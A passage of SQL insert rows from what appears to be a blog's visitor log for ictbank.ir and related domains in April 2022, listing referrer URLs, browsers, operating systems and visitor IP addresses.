(20140,'2022-04-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.246.83','000',0,2,0),
(20141,'2022-04-15','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','209.141.41.193','000',0,3,0),
(20142,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.17','000',0,2,0),
(20143,'2022-04-15','http://www.ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.117.203','000',0,1,0),
(20144,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.7','000',0,1,0),
(20145,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.8','000',0,1,0),
(20146,'2022-04-15','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','54.210.200.143','000',0,1,0),
(20147,'2022-04-15','http://mail.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','8.31.2.98','000',0,1,0),
(20148,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.19','000',0,1,0),
(20149,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.18','000',0,1,0),
(20150,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','211.95.50.182','000',0,2,0),
(20151,'2022-04-15','http://www.design-arena.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.116.89','000',0,1,0),
(20152,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','101.227.1.197','000',0,1,0),
(20153,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','205.185.122.184','000',0,1,0),
(20154,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.96.159','000',0,1,0),
(20155,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','185.220.101.56','000',0,2,0),
(20156,'2022-04-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(20157,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','4.0',NULL,NULL,'','185.220.101.33','000',0,2,0),
(20158,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(20159,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','2.58.56.14','000',0,1,0),
(20160,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.220.101.27','000',0,1,0),
(20161,'2022-04-15','http://www.design-arena.ir/blog','Chrome','Android','6.0',NULL,NULL,'','124.223.197.105','000',0,4,0),
(20162,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.56.205.36','000',0,1,0),
(20163,'2022-04-15','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','78.106.206.82','000',0,1,0),
(20164,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','10.8.2',NULL,NULL,'','185.195.71.2','000',0,1,0),
(20165,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','10.8.2',NULL,NULL,'','185.220.100.242','000',0,1,0),
(20166,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.93.114.5','000',0,1,0),
(20167,'2022-04-15','http://ictbank.ir/blog/index.php/tag/rpm/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,7,0),
(20168,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.112.208.37','000',0,1,0),
(20169,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','1.54.79.249','000',0,1,0),
(20170,'2022-04-15','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','1.54.79.249','000',0,1,0),
(20171,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','1.54.79.249','000',0,1,0),
(20172,'2022-04-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','135.148.100.25','000',0,2,0),
(20173,'2022-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.46.55','000',0,2,0),
(20174,'2022-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20175,'2022-04-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20176,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','185.220.101.67','000',0,1,0),
(20177,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','198.98.57.191','000',0,1,0),
(20178,'2022-04-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(20179,'2022-04-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.103','000',0,2,0),
(20180,'2022-04-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(20181,'2022-04-15','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','196.242.131.25','000',0,13,0),
(20182,'2022-04-15','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','198.46.171.81','000',0,2,0),
(20183,'2022-04-15','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.15.197.24','000',0,2,0),
(20184,'2022-04-15','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','149.62.207.224','000',0,1,0),
(20185,'2022-04-16','https://www.google.com/','Opera','Windows','10.0',NULL,NULL,'','179.6.139.215','000',0,1,0),
(20186,'2022-04-16','http://wikisonnati.com/blog','Chrome','Windows','10.0',NULL,NULL,'','92.118.36.208','000',0,2,0),
(20187,'2022-04-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','82.165.81.190','000',0,1,0),
(20188,'2022-04-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.165','000',0,2,0),
(20189,'2022-04-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20190,'2022-04-16','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','107.189.12.135','000',0,1,0),
(20191,'2022-04-16','http://ictbank.ir/blog','Chrome','Chrome OS','Unknown',NULL,NULL,'','185.220.101.16','000',0,1,0),
(20192,'2022-04-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','89.187.171.165','000',0,2,0),
(20193,'2022-04-16','http://82.102.9.14/blog','Chrome','OS X','10.15.7',NULL,NULL,'','34.252.233.209','000',0,1,0),
(20194,'2022-04-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','147.182.150.89','000',0,2,0),
(20195,'2022-04-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','185.220.102.253','000',0,4,0),
(20196,'2022-04-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(20197,'2022-04-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.225.16','000',0,2,0),
(20198,'2022-04-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,3,0),
(20199,'2022-04-16','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.121.80.103','000',0,1,0),
(20200,'2022-04-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','171.25.193.25','000',0,1,0),
(20201,'2022-04-16','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.225.163.217','000',0,3,0),
(20202,'2022-04-16','http://ictbank.ir/blog/index.php/tag/expdp/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.8','000',0,7,0),
(20203,'2022-04-16','http://baidu.com/','MIUI Browser','Android','8.0.0',NULL,NULL,'','42.236.10.78','000',0,1,0),
(20204,'2022-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.187.222','000',0,1,0),
(20205,'2022-04-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20206,'2022-04-16','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.131.38.71','000',0,4,0),
(20207,'2022-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.37','000',0,1,0),
(20208,'2022-04-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','67.211.210.168','000',0,8,0),
(20209,'2022-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,2,0),
(20210,'2022-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(20211,'2022-04-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.225.57','000',0,1,0),
(20212,'2022-04-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','157.230.110.87','000',0,2,0),
(20213,'2022-04-16','https://l.instagram.com/','Instagram','Android','11',NULL,NULL,'','5.211.175.67','000',0,1,0),
(20214,'2022-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,2,0),
(20215,'2022-04-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(20216,'2022-04-17','http://www.ictbank.ir/?feed=rss2','Internet Explorer','Windows','6.1',NULL,NULL,'','180.76.102.66','000',0,2,0),
(20217,'2022-04-17','https://www.bing.com','Chrome','Windows','10.0',NULL,NULL,'','128.199.201.90','000',0,3,0),
(20218,'2022-04-17','https://www.google.com.hk/','Chrome','Windows','10.0',NULL,NULL,'','117.136.45.125','000',0,1,0),
(20219,'2022-04-17','http://ictbank.ir/blog','Android Browser','Android','6.0',NULL,NULL,'','36.150.60.24','000',0,2,0),
(20220,'2022-04-17','http://ictbank.ir/blog','Firefox','OS X','10.8',NULL,NULL,'','36.150.60.34','000',0,1,0),
(20221,'2022-04-17','http://www.wikisonnati.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.75.95.101','000',0,2,0),
(20222,'2022-04-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','40.133.218.154','000',0,1,0),
(20223,'2022-04-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,1,0),
(20224,'2022-04-17','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.126.177.54','000',0,2,0),
(20225,'2022-04-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','216.158.196.252','000',0,2,0),
(20226,'2022-04-17','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','95.142.119.17','000',0,5,0),
(20227,'2022-04-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','202.21.38.198','000',0,2,0),
(20228,'2022-04-17','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','37.120.203.87','000',0,2,0),
(20229,'2022-04-17','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','107.189.30.86','000',0,1,0),
(20230,'2022-04-17','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','185.243.218.32','000',0,1,0),
(20231,'2022-04-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','111.85.200.180','000',0,1,0),
(20232,'2022-04-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','70.40.220.111','000',0,1,0),
(20233,'2022-04-17','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','77.138.201.4','000',0,2,0),
(20234,'2022-04-17','http://ictbank.ir/blog','Safari','OS X','10.6.8',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20235,'2022-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(20236,'2022-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.168.22','000',0,1,0),
(20237,'2022-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20238,'2022-04-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20239,'2022-04-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20240,'2022-04-17','http://ictbank.ir/blog/index.php/tag/database/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.4','000',0,7,0),
(20241,'2022-04-17','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','35.172.213.88','000',0,2,0),
(20242,'2022-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(20243,'2022-04-18','https://www.ecosia.org/','Chrome','Windows','10.0',NULL,NULL,'','222.127.186.30','000',0,3,0),
(20244,'2022-04-18','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','180.183.214.97','000',0,1,0),
(20245,'2022-04-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','67.211.210.168','000',0,16,0),
(20246,'2022-04-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','105.160.118.43','000',0,1,0),
(20247,'2022-04-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(20248,'2022-04-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.90.160.138','000',0,2,0),
(20249,'2022-04-18','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','185.128.26.218','000',0,2,0),
(20250,'2022-04-18','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','191.101.31.17','000',0,6,0),
(20251,'2022-04-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(20252,'2022-04-18','http://wikisonnati.com','Chrome','Windows','6.1',NULL,NULL,'','5.56.58.29','000',0,2,0),
(20253,'2022-04-18','http://wikisonnati.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.136','000',0,1,0),
(20254,'2022-04-18','http://wikisonnati.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.135','000',0,1,0),
(20255,'2022-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','151.55.79.32','000',0,3,0),
(20256,'2022-04-18','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','202.94.175.191','000',0,13,0),
(20257,'2022-04-18','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','104.129.3.203','000',0,2,0),
(20258,'2022-04-18','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','137.74.206.64','000',0,1,0),
(20259,'2022-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.212.230.144','000',0,1,0),
(20260,'2022-04-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.201.154','000',0,2,0),
(20261,'2022-04-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,1,0),
(20262,'2022-04-18','http://ictbank.ir/blog/index.php/tag/progress/','Chrome','Windows','6.2',NULL,NULL,'','46.161.11.6','000',0,7,0),
(20263,'2022-04-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','71.6.146.186','000',0,2,0),
(20264,'2022-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.216.232.102','000',0,1,0),
(20265,'2022-04-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,2,0),
(20266,'2022-04-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.87','000',0,2,0),
(20267,'2022-04-18','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.145.170.22','000',0,4,0),
(20268,'2022-04-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(20269,'2022-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','108.61.208.75','000',0,1,0),
(20270,'2022-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(20271,'2022-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20272,'2022-04-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(20273,'2022-04-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.2.76.246','000',0,1,0),
(20274,'2022-04-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(20275,'2022-04-18','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','188.241.177.234','000',0,2,0),
(20276,'2022-04-19','http://ictbank.ir/blog/about-me/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.8','000',0,6,0),
(20277,'2022-04-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.21','000',0,1,0),
(20278,'2022-04-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','47.186.104.129','000',0,1,0),
(20279,'2022-04-19','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.22','000',0,1,0),
(20280,'2022-04-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.54.126.74','000',0,1,0),
(20281,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','139.59.122.225','000',0,2,0),
(20282,'2022-04-19','http://ictbank.ir/blog','Obigo Q','Unknown','Unknown',NULL,NULL,'','152.67.35.9','000',0,2,0),
(20283,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','141.98.1.139','000',0,8,0),
(20284,'2022-04-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20285,'2022-04-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','193.146.253.200','000',0,1,0),
(20286,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.136.18','000',0,2,0),
(20287,'2022-04-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.170','000',0,2,0),
(20288,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.125.37','000',0,1,0),
(20289,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,3,0),
(20290,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.254.199.11','000',0,1,0),
(20291,'2022-04-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.90','000',0,2,0),
(20292,'2022-04-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.102.254','000',0,1,0),
(20293,'2022-04-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,6,0),
(20294,'2022-04-19','http://ictbank.ir/blog','Chrome','OS X','10.13.3',NULL,NULL,'','172.98.86.186','000',0,2,0),
(20295,'2022-04-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(20296,'2022-04-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','103.177.224.106','000',0,2,0),
(20297,'2022-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','95.179.208.185','000',0,1,0),
(20298,'2022-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.211.123.140','000',0,1,0),
(20299,'2022-04-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.40','000',0,2,0),
(20300,'2022-04-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.204.255.90','000',0,2,0),
(20301,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.172.191.127','000',0,1,0),
(20302,'2022-04-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','24.28.67.246','000',0,1,0),
(20303,'2022-04-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.88','000',0,2,0),
(20304,'2022-04-20','http://ictbank.ir/blog','Obigo Q','Unknown','Unknown',NULL,NULL,'','152.67.35.9','000',0,3,0),
(20305,'2022-04-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20306,'2022-04-20','http://ictbank.ir/blog/index.php/tag/sql/','Chrome','Windows','6.1',NULL,NULL,'','46.161.11.144','000',0,7,0),
(20307,'2022-04-20','http://ictbank.ir/blog','Chrome','NetBSD','',NULL,NULL,'','181.214.206.161','000',0,2,0),
(20308,'2022-04-20','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','110.52.217.14','000',0,1,0),
(20309,'2022-04-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(20310,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.223.50.155','000',0,1,0),
(20311,'2022-04-20','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','211.24.67.76','000',0,1,0),
(20312,'2022-04-20','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','203.249.36.139','000',0,3,0),
(20313,'2022-04-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','76.72.172.165','000',0,1,0),
(20314,'2022-04-20','http://82.102.9.14/','Chrome','OS X','10.7.0',NULL,NULL,'','23.224.186.207','000',0,3,0),
(20315,'2022-04-20','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.71.10.105','000',0,1,0),
(20316,'2022-04-20','http://wikisonnati.com/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.161.11.37','000',0,2,0),
(20317,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','171.251.99.251','000',0,2,0),
(20318,'2022-04-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.7','000',0,2,0),
(20319,'2022-04-20','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','95.217.3.231','000',0,1,0),
(20320,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','185.56.80.65','000',0,2,0),
(20321,'2022-04-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.172','000',0,2,0),
(20322,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.118.36.208','000',0,1,0),
(20323,'2022-04-20','https://www.google.it/','Chrome','Windows','10.0',NULL,NULL,'','93.47.229.98','000',0,1,0),
(20324,'2022-04-20','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.239.233.175','000',0,1,0),
(20325,'2022-04-20','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','185.129.61.9','000',0,1,0),
(20326,'2022-04-20','http://ictbank.ir/blog','Chrome','OS X','10.8.0',NULL,NULL,'','94.102.56.8','000',0,1,0),
(20327,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.185.123.56','000',0,1,0),
(20328,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.45','000',0,1,0),
(20329,'2022-04-20','http://ictbank.ir/blog','Safari','Windows','5.1',NULL,NULL,'','3.66.75.129','000',0,1,0),
(20330,'2022-04-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.166','000',0,2,0),
(20331,'2022-04-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.179.194.35','000',0,1,0),
(20332,'2022-04-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(20333,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.247.74.206','000',0,1,0),
(20334,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.34.33.2','000',0,1,0),
(20335,'2022-04-20','http://ictbank.ir/','Firefox','Linux','Unknown',NULL,NULL,'','204.237.48.103','000',0,1,0),
(20336,'2022-04-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.170','000',0,2,0),
(20337,'2022-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','104.238.190.161','000',0,1,0),
(20338,'2022-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(20339,'2022-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.166.158.7','000',0,1,0),
(20340,'2022-04-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','46.101.79.124','000',0,1,0),
(20341,'2022-04-20','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','109.237.25.78','000',0,2,0),
(20342,'2022-04-20','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','195.181.168.164','000',0,4,0),
(20343,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','185.220.100.245','000',0,1,0),
(20344,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','45.61.186.108','000',0,1,0),
(20345,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.249.228.28','000',0,2,0),
(20346,'2022-04-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.242.249.246','000',0,1,0),
(20347,'2022-04-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,2,0),
(20348,'2022-04-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.204.146','000',0,4,0),
(20349,'2022-04-21','http://82.102.9.14/blog','Firefox','Linux','Unknown',NULL,NULL,'','159.65.178.143','000',0,2,0),
(20350,'2022-04-21','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','130.162.169.44','000',0,2,0),
(20351,'2022-04-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','41.110.190.114','000',0,2,0),
(20352,'2022-04-21','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.94','000',0,2,0),
(20353,'2022-04-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(20354,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','6.0',NULL,NULL,'','5.188.62.140','000',0,3,0),
(20355,'2022-04-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(20356,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','23.154.177.19','000',0,1,0),
(20357,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','198.98.62.120','000',0,1,0),
(20358,'2022-04-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','193.218.118.95','000',0,1,0),
(20359,'2022-04-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','185.220.101.74','000',0,1,0),
(20360,'2022-04-21','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','40.88.43.240','000',0,10,0),
(20361,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','159.203.172.237','000',0,2,0),
(20362,'2022-04-21','http://ictbank.ir/blog','Chrome','OS X','10.9.2',NULL,NULL,'','208.68.5.17','000',0,2,0),
(20363,'2022-04-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(20364,'2022-04-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','94.102.61.10','000',0,2,0),
(20365,'2022-04-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.120.227.2','000',0,1,0),
(20366,'2022-04-21','https://www.google.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','86.32.36.129','000',0,1,0),
